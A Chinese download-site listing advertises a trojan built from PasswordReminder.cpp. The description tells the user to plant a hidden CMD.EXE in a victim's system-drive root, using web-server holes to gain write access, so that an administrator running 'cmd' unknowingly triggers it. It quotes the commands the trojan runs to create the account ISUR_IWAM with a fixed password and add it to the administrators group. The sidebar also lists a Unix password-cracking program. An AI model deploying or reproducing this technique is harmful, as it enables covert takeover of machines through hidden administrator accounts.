登录
首页 » Network Security » 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...

于 2022-06-01 发布 文件大小:18.50 kB
0 42
下载积分: 2 下载次数: 1

代码说明:

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • the resoures about the capturing of data from ethernet.
    基于winpcap 对于以太网帧头的捕获。用c++编写-the resoures about the capturing of data from ethernet.
    2022-08-08 07:14:43下载
    积分:1
  • 支持访问USB设备的DOS下很有用。
    Support access usb device under dos.Very useful
    2023-03-10 08:50:03下载
    积分:1
  • 一个用hook写的屏蔽ctrl+alt+del的小程序
    一个用hook写的屏蔽ctrl+alt+del的小程序-a hook was used to shield the ctrl alt del small programs
    2023-06-04 00:15:02下载
    积分:1
  • CRC _ 1.0 _ i386的源码
    CRC_1.0_i386源码-CRC_1.0_i386 FOSS
    2022-05-27 07:58:50下载
    积分:1
  • 犯错
    随缘网络产品管理系统 V2.0 一、全站采用主流DIV+CSS框架布局,DIV+CSS的优势何在? 1、符合W3C标准。微软等公司均为W3C支持者。这一点是最重要的,因为这保证您的网站不会因为将来网络应用的升级而被淘汰。 2、支持浏览器的向后兼容,也就是无论未来的浏览器大战,胜利的是IE7或者是火狐,您的网站都能很好的兼容。 3、搜索引擎更加友好。相对与传统的table, 采用DIV+CSS技术的网页,对于搜索引擎的收录更加友好。 4、样式的调整更加方便。内容和样式的分离,使页面和样式的调整变得更加方便。 二、产品系统采用二级分类。 三、新增广告栏目,可以对幻灯、banner等图片后台随意的进行添加更换删除设置,同时有良好的扩展性。 四、新增了单页相关栏目,如联系我们,关于我们等可后台进行编辑修改相关内容。同时有相应的扩展功能! 五、色调以橙色为主色调,背景为北京奥运祥云火炬,突出奥运气氛!-err
    2023-06-16 16:45:04下载
    积分:1
  • UNIX系统的安全性
    unix system security- unix system security
    2022-11-09 10:05:04下载
    积分:1
  • 网络安全技术手册,可以大体了解当前的信息安全的状况
    网络安全技术手册,可以大体了解当前的信息安全的状况-Network security technical manual, you can generally understand the current state of information security
    2023-03-04 06:45:03下载
    积分:1
  • 编程读取,设置linux内核的link信息,用于状态检测防火墙的内容过滤部分...
    编程读取,设置linux内核的link信息,用于状态检测防火墙的内容过滤部分-programming read, installed linux kernel link information, for the state inspection firewall part of the content filtering
    2023-06-12 03:25:03下载
    积分:1
  • 解Unix密码的程序源码和字典
    解Unix密码的程序源码和字典 -The source and dictionary for cracking unix password
    2022-02-16 00:29:37下载
    积分:1
  • 职工管理 的一个基本程序
    职工管理 的一个基本程序-management workers a basic management procedures
    2022-02-21 07:38:47下载
    积分:1
  • 696518资源总数
  • 104269会员总数
  • 31今日下载